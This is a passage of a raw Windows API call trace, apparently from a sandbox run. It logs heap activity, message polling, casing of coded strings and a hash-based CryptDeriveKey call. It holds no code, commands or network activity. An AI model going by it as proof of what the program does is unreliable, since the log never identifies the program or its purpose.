wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0258.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0258.220] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3a0 [0258.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0258.220] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.221] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0258.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.221] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.221] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0258.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0258.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.222] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.222] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.222] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0258.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.222] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.222] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0258.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0258.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.223] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.223] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0258.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0258.224] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.224] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.224] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.224] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.224] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.224] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.224] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.224] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.225] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.225] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0258.225] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.225] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0258.225] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.225] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.225] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.225] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0258.225] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.225] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.226] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.226] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.226] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0258.226] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.226] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.226] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.226] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.226] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.226] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.226] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.226] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.226] CryptHashData (hHash=0xaa5820, pbData=0x24b1c48, dwDataLen=0x3, dwFlags=0x1) returned 1 [0258.227] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.227] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.227] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.227] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.227] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.227] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.228] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.228] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.228] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0258.228] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.228] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0258.228] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.228] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.228] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.228] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa5820, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa57a0) returned 1 [0258.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0258.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0258.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0258.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0258.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0258.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0258.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0258.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0258.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0258.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0258.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0258.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0258.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0258.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0258.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0258.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0258.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0258.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0258.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0258.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0258.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0258.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0258.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0258.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0258.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0258.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0258.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0258.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0258.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0258.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0258.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0258.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0258.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0258.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0258.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0258.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0258.235] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0258.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0258.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0258.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0258.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.236] HeapFree (in: 